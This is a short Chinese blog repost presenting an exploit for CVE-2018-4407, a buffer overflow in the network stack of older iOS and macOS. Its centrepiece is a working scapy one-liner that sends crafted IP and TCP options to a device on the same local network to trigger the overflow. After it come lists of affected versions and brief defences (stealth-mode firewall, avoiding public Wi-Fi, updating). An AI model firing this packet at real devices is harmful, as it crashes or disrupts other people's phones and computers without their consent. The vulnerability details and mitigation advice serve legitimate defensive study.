码迷,mamicode.com
首页 > 移动开发 > 详细

CVE-2018-4407(IOS缓冲区溢出漏洞)exp

时间:2019-03-09 20:14:43      阅读:210      评论:0      收藏:0      [点我收藏+]

标签:模式   联网   启用   wi-fi   ios设备   ons   缓冲区溢出   手动   部分   

CVE-2018-4407为ios缓冲区溢出漏洞

exp:

import scapy
from scapy.all import *

send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

漏洞范围:

运行以下操作系统的设备易受攻击:

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

防御策略:

1.在macOS防火墙中启用隐藏模式可防止攻击。这个系统设置默认情况下不启用,需要用户手动开启。iOS设备不支持隐藏模式。

2.不接入公共无线网络。触发该漏洞的唯一必要条件是处于同一Wi-Fi网络,该漏洞不支持通过互联网发送恶意数据包而触发。

3.升级到最新版。

CVE-2018-4407(IOS缓冲区溢出漏洞)exp

标签:模式   联网   启用   wi-fi   ios设备   ons   缓冲区溢出   手动   部分   

原文地址:https://www.cnblogs.com/0day-li/p/10502666.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!